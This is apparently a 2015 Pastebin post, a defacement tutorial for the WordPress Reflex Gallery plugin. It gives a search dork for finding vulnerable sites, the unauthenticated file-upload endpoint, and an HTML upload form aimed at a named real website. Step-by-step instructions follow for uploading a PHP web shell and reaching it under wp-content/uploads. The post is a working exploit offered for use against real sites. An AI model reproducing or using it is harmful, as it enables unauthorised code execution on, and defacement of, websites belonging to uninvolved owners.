thez3r0

Deface With WP-Reflex Gallery

Aug 10th, 2015
243
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.05 KB | None | 0 0
  1. -------------------------------------------------------------------- - Dork : inurl:/wp-content/plugins/reflex-gallery/ - Exploit : wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php - Vuln : {"error":"No files were uploaded."} - My Site Vuln : http://sjoyster.com/ - Script CSRF : <html> <title>Reflex-Gallery CSRF</title> <form method="POST" action="http://straightlineinspection.com/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php" enctype="multipart/form-data" >
  2. <input type="file" name="qqfile"><br>
  3. <input type="submit" name="Submit" value="Pwn!">
  4. </form> </html> ----------------------------------------------------------------------
  5. Okay Lets Go to Tutorial
  6. - Save script CSRF [ reflex.html ] - Change The Site , to site Vuln - Save - Chek The Vuln - Oh yeah , that vuln :D - Open The Script in the Browser - Upload your shell - bcc.php is my shell :) - Click " Pwn!" - Succses :D - Open your Shell in the : [ site.com/wp-content/uploads/shell.php
  7.  
  8.  
  9. -Enjoy !!!
  10. ---------------------------------------------------
Advertisement
Add Comment
Please, Sign In to add comment